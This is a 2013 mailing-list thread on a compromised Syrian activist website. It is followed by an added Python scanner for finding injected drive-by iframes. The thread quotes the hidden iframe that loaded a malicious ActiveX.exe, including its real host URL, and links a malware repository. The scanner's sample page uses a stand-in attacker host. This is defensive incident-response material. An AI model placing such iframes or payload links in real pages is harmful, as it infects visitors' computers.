[liberationtech] Syrian-martyrs.com website probably compromised by virus
Andrew Lewis
me at andrewlew.is
Tue Jan 29 14:41:13 PST 2013
Just a heads up: the site's been taken down, malware is here:
https://resources.telecomix.ceops.eu/material/malwares/
Also looking at getting access to the server in question for forensics.
-Andrew
On Jan 30, 2013, at 11:34 AM, SiNA Rabbani <sina at redteam.io> wrote:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
This is the malware:
https://www.virustotal.com/file/cfdd3a78a895b3f49a39402eb28b0d2134cc3086849a41a6fdfe7d829a0d4dcd/analysis/
- --SiNA
SiNA Rabbani:
holy shit:
<iframe name="I1" width="10" height="10"
src="http://acadcisco.unisla.pt/downloads/uploads/software/ActiveX.exe"
border="0"
frameborder="0">
:/ if you are running Windows don't even go there!!!
Andrew Lewis:
I can get to this in 6 hours or so, maybe someone is willing to
jump on this before then?
-Andrew
On Jan 30, 2013, at 11:06 AM, KheOps <kheops at ceops.eu> wrote:
Dear Libtech,
We just saw that the website http://www.syrian-martyrs.com
is probably compromised. Every page of the website contains an
iFrame which links to a .exe file which is detected as a virus
by antivirus software:
http://acadcisco.unisla.pt/downloads/uploads/software/ActiveX.exe
The fact that the HTML code is present at the bottom of each page makes
me think that the "index.php" page has been changed in a way
that makes that iFrame appear on every page of the website,
after the dynamic content.
It also probably means that the attackers have some kind of
access to the server. My guess would be going to a PHP shell,
but I'm no expert in this.
Any help, clue, investigation, would be very welcome :)
Thank you, KheOps
-- Unsubscribe, change to digest, or change password at:
https://mailman.stanford.edu/mailman/listinfo/liberationtech
- --
“Be the change you want to see in the world.” Gandhi
OTR: inf0 at jabber.ccc.de
a5dae15f45a37e9768f6deae7b54807fc4942ec9
-----BEGIN PGP SIGNATURE-----
=+vsJ
-----END PGP SIGNATURE-----
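The thread above describes a classic drive-by injection: a 10x10 iframe pointing at an .exe, appended to the bottom of every page, which KheOps reads as a sign that index.php (or a shared include) was modified rather than each page being edited by hand. The following is an added example, not code from the thread or from any of its participants: a small scanner that applies the same reasoning to saved or fetched HTML. It flags iframes that are tiny or CSS-hidden, that load an executable extension, that point off-site, or that sit after the closing </html> tag (the "appended after the dynamic content" pattern), and then checks whether every flagged page carries the same injected src, which is what a modified shared include would produce. The host attacker.invalid, the sample page contents and the threshold values are all constructed assumptions for illustration; the heuristics are a triage aid, not a malware detector.

```python
"""Triage scanner for injected drive-by iframes (added example, not from the thread).

Heuristics (assumed, tune to taste):
  * the iframe is tiny (width/height <= TINY_PX) or hidden via CSS
  * its src loads an executable extension and/or an off-site host
  * it appears after </html>, i.e. was appended after the page was rendered
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

EXEC_EXTENSIONS = (".exe", ".scr", ".com", ".bat", ".msi", ".pif")  # assumed list
TINY_PX = 10  # the iframe reported in the thread was 10x10


class _IframeCollector(HTMLParser):
    """Record every <iframe> with its attributes and the line it starts on,
    plus the line of the first </html>, so we can tell what came after it."""

    def __init__(self):
        super().__init__()
        self.iframes = []
        self.html_close_line = None

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append({"attrs": dict(attrs), "line": self.getpos()[0]})

    def handle_endtag(self, tag):
        if tag == "html" and self.html_close_line is None:
            self.html_close_line = self.getpos()[0]


def _px(value):
    """Parse '10' or '10px' into an int; None for anything else (e.g. '100%')."""
    if value is None:
        return None
    v = value.strip().lower().rstrip("px").strip()
    return int(v) if v.isdigit() else None


def find_suspicious_iframes(html, site_host):
    """Return one finding per iframe that trips at least one heuristic."""
    p = _IframeCollector()
    p.feed(html)
    p.close()
    findings = []
    for f in p.iframes:
        a, reasons = f["attrs"], []
        w, h = _px(a.get("width")), _px(a.get("height"))
        if (w is not None and w <= TINY_PX) or (h is not None and h <= TINY_PX):
            reasons.append("tiny frame")
        style = (a.get("style") or "").replace(" ", "").lower()
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("hidden by css")
        src = a.get("src") or ""
        u = urlparse(src)
        if u.netloc and u.netloc.lower() != site_host.lower():
            reasons.append("off-site src %s" % u.netloc)
        if u.path.lower().endswith(EXEC_EXTENSIONS):
            reasons.append("executable src")
        if p.html_close_line is not None and f["line"] > p.html_close_line:
            reasons.append("after </html>")
        if reasons:
            findings.append({"src": src, "line": f["line"], "reasons": reasons})
    return findings


def scan_site(pages, site_host):
    """Map path -> findings for every page that has any; clean pages are omitted."""
    report = {}
    for path, html in pages.items():
        hits = find_suspicious_iframes(html, site_host)
        if hits:
            report[path] = hits
    return report


def shared_injection(report):
    """If every executable-src hit across the site points at one identical URL,
    return it: that pattern fits a single modified include (index.php, footer
    template) rather than per-page edits. Otherwise return None."""
    srcs = {hit["src"] for hits in report.values() for hit in hits
            if "executable src" in hit["reasons"]}
    return srcs.pop() if len(srcs) == 1 else None


# Constructed sample pages (not captured from the real site).
CLEAN_PAGE = """<html><head><title>Archive</title></head>
<body><h1>Archive</h1>
<iframe src="/embed/player.html" width="640" height="360"></iframe>
</body></html>
"""
INFECTED_PAGE = CLEAN_PAGE + """<iframe name="I1" width="10" height="10"
src="http://attacker.invalid/uploads/ActiveX.exe" border="0" frameborder="0"></iframe>
"""
SAMPLE_SITE = {"/index.php": INFECTED_PAGE, "/about.php": INFECTED_PAGE,
               "/static.html": CLEAN_PAGE}

if __name__ == "__main__":
    rep = scan_site(SAMPLE_SITE, "www.example.org")
    for path, hits in rep.items():
        for hit in hits:
            print(path, hit["src"], ", ".join(hit["reasons"]))
    print("shared injected src:", shared_injection(rep))
```

In practice you would feed `scan_site` the output of a crawl of the compromised host (or the files under the web root), then grep the shared src string through the PHP tree to find the modified include; the static .html page being clean while every .php page is hit is itself evidence for KheOps's "index.php was changed" hypothesis.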